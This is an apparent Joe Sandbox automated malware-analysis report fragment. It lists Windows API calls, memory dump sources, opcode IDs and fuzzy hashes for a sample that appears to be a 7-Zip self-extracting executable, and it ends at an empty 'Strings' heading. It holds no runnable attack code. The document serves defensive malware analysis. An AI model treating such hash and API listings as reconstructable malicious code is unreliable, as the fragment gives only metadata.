                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3168844106-0
                                                                                                                                                                • Opcode ID: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                                                                                                                                                • Instruction ID: b96cbccc89c31bbccc7d9b04d0ab1e0d7f4ede81ffdd75c3392c9c36ee2ff524
                                                                                                                                                                • Opcode Fuzzy Hash: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                                                                                                                                                • Instruction Fuzzy Hash: 43F0B432200204ABCB218F95CC08ECABBB9EF49761F14441AFA05E7220C775E860DBA4
                                                                                                                                                                APIs
                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 004012EF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                                                                                                                                                • Instruction ID: a535b6e06518e329df30477031f310d0f2202fa2471075cd59bb490024d4aebd
                                                                                                                                                                • Opcode Fuzzy Hash: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                                                                                                                                                • Instruction Fuzzy Hash: EDF05E321006029BC7209F55C804BA773F5BB88310F04482EE046F25A0D738A891DF59
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0041229A: CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,004123BE,?,80000000,?,?,?,004123E0), ref: 0041238D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3498533004-0
                                                                                                                                                                • Opcode ID: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                                                                                                                                                • Instruction ID: 5404b23c39375f3672358c8d8a6143ebe8ef3d7cff4e6c8b62a506d5a933efac
                                                                                                                                                                • Opcode Fuzzy Hash: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                                                                                                                                                • Instruction Fuzzy Hash: 05E086360003297BCF115F64AD01BCE3F55AF09360F104116FA24961F0C7B2C4B5AB95
                                                                                                                                                                APIs
                                                                                                                                                                • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00412AE7,00000001,0041EA30,0041EA30,0041A558,?,00405A74,?,?), ref: 004124CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                • Opcode ID: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                                                                                                                                                • Instruction ID: b461439d7febe1c34a09764e505ffeaa1d621892ee7a9e15149591a9498c33bb
                                                                                                                                                                • Opcode Fuzzy Hash: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                                                                                                                                                • Instruction Fuzzy Hash: 21E0C275640208FFDB00DF95D801BDE7BB9AB09354F10C069F9189A260D3799A60DF55
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3519838083-0
                                                                                                                                                                • Opcode ID: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                                                                                                                                                • Instruction ID: f5503d52053c13d59ef663bb5271dc3ef65e74f3c8d6ef33482ecfccbeeb62e3
                                                                                                                                                                • Opcode Fuzzy Hash: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                                                                                                                                                • Instruction Fuzzy Hash: F0E08C72A00108FBDB219F85DC01BEEBB38FB40354F00842FF51151110CB795A509A68
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _beginthreadex
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3014514943-0
                                                                                                                                                                • Opcode ID: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                                                                                                                                                • Instruction ID: 07ee00ee9fd24b5c7ccaf45b7f299fd8fb924091db141d3d19c4ab49eb9d3da1
                                                                                                                                                                • Opcode Fuzzy Hash: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                                                                                                                                                • Instruction Fuzzy Hash: 69D017F6800208BFCB01DFA0CC05CEA3BADEB08248B008465BD05C2210E632DA108B61
                                                                                                                                                                APIs
                                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00412407
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                • Opcode ID: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                                                                                                                                                • Instruction ID: 9ccc3df45c5337931c1f9920f453614b41e8bb9900b5d069a402b44b4c854426
                                                                                                                                                                • Opcode Fuzzy Hash: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                                                                                                                                                • Instruction Fuzzy Hash: 99E0EC75201208FFDB01CF90CC01FDE7BBDFB49754F208058E90496160C7759A24EB55
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                                                                                                                                                • Instruction ID: a48faa5ad871c9538198cc58908edd1886e2b5d46e41b8f7632e96d43fd9665f
                                                                                                                                                                • Opcode Fuzzy Hash: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                                                                                                                                                • Instruction Fuzzy Hash: D7D02231104B22478160BB6AC8004CF73C69F113343008E1EF465836E0C638FDD182DE
                                                                                                                                                                APIs
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040119C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2525500382-0
                                                                                                                                                                • Opcode ID: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                                                                                                                                                • Instruction ID: 80e429c9655060905b03d38468354203b5df30ae66867c399f2ea5f3bf3c7cce
                                                                                                                                                                • Opcode Fuzzy Hash: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                                                                                                                                                • Instruction Fuzzy Hash: 87C08C36190203CBC7004F30CC026457BE1BBA0714B6486A8A065C63B0DA3EC448CA01
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                • Opcode ID: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                                                                                                                                                • Instruction ID: 2bfd4fe5492bcf1d3212a322bb009ce45eed1b46813e47afac693d05b876fedf
                                                                                                                                                                • Opcode Fuzzy Hash: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                                                                                                                                                • Instruction Fuzzy Hash: 0BC09B753181049BC718FF21C450817B365AB64714714C85FF84C55547CA3BDC82E618
                                                                                                                                                                APIs
                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?,004124A9,00000000,00000000,?,004012DC,?), ref: 0041248D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileTime
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1425588814-0
                                                                                                                                                                • Opcode ID: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                                                                                                                                                • Instruction ID: f7402770b179a49de0ab9fe0b192ea54849ac29a58fff8f6d7b1295910a8291e
                                                                                                                                                                • Opcode Fuzzy Hash: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                                                                                                                                                • Instruction Fuzzy Hash: 31C04C36159105FF8F020F70CC04C1ABFA2AB99311F10CA18B155C4074C7328034EB12
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00000000,?,?,?,?,?,?,00401AD3,?), ref: 004015F7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                • Opcode ID: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
                                                                                                                                                                • Instruction ID: 576c3123db9d42ad6f26370305c4fe05627a80a4f610c37a806172f0a9a2cc4a
                                                                                                                                                                • Opcode Fuzzy Hash: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
                                                                                                                                                                • Instruction Fuzzy Hash: C5318271910115ABDB10EFE5CC84CEFB7B8EF48344B15087BE441B72A1D7799E818B69
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 00412927
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                • Opcode ID: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
                                                                                                                                                                • Instruction ID: 8d352c1c46fd1df2ac59e7115e7018534418c9226e76046c12a2ea9475f01b4a
                                                                                                                                                                • Opcode Fuzzy Hash: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
                                                                                                                                                                • Instruction Fuzzy Hash: 3F21C3717142869BCF34FF658A904EB7395AF40314B14462FE482D3201C7B8ADE5CB5E
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                • Opcode ID: ac816b6ef2abf4182fe3fab88150d6e7fb7849f17cb6b15ec7980f19aa18face
                                                                                                                                                                • Instruction ID: 1b5e1ee4d6878524e1e94f3eb7038bf21a854c21e9593a8af651c0b03c199f54
                                                                                                                                                                • Opcode Fuzzy Hash: ac816b6ef2abf4182fe3fab88150d6e7fb7849f17cb6b15ec7980f19aa18face
                                                                                                                                                                • Instruction Fuzzy Hash: FED0A9312082203AEA5862320C119AF08884F40329B008C3FB802E62D1DE3ECE81429E
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                • Opcode ID: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                                                                                                                                                • Instruction ID: 2edd4d7db1caf844859ff0a1764f07c4c63b16d89aef5b3dab10146b982c9a76
                                                                                                                                                                • Opcode Fuzzy Hash: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                                                                                                                                                • Instruction Fuzzy Hash: 4DD01231604161468E745E3C7A445D637D85A06370321079BF4B5C32E1D3B58CD35A98
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004133A4,?,?,?,0040C03F,?), ref: 00402A4B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                                                                                                                                                • Instruction ID: 5872fe86412dcdd468f52b7ecb5979782df8fbe157f8593837c634c381a8cb4c
                                                                                                                                                                • Opcode Fuzzy Hash: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                                                                                                                                                • Instruction Fuzzy Hash: 5FC08C703483007AEE211B748F0BB4B3653AF84B16F90C029F348B40E0CBF58410AA0A
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00004B38), ref: 00412245
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                • Opcode ID: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
                                                                                                                                                                • Instruction ID: 3495fa19a298e49cc2800c4131356790e1569378de7ddbf050defd7ea7821dd7
                                                                                                                                                                • Opcode Fuzzy Hash: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
                                                                                                                                                                • Instruction Fuzzy Hash: 40B012E474010671AE4420721F132EF20C007D1385F0408B7AA07E42C2FEDCCAE5912F
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,00413333,00000000,?,0041339B,?,?,0040C03F,?), ref: 00402002
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                • Opcode ID: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                                                                                                                                                • Instruction ID: 703a6ff84afb8074b9885b8fa9c0ccab1db7962bc4b9572073b4c9a6fb1bc3a6
                                                                                                                                                                • Opcode Fuzzy Hash: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                                                                                                                                                • Instruction Fuzzy Hash: 8DB09230285700BAEF224B00DE0DB4A76A0BB80B06F24C428B288240E087B86818DA0E
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                                                                                                                • wsprintfW.USER32 ref: 004024DD
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                                                                                                                • GetLastError.KERNEL32 ref: 004024F7
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040252C
                                                                                                                                                                • lstrcmpiW.KERNEL32(00ABA1E8,?), ref: 00402541
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00ABA1E8), ref: 00402551
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
                                                                                                                                                                • SetLastError.KERNEL32(00000003), ref: 00402578
                                                                                                                                                                • lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                                                                                                                • _wtol.MSVCRT ref: 0040260A
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,00ABA1E8,00000002), ref: 0040262A
                                                                                                                                                                Strings
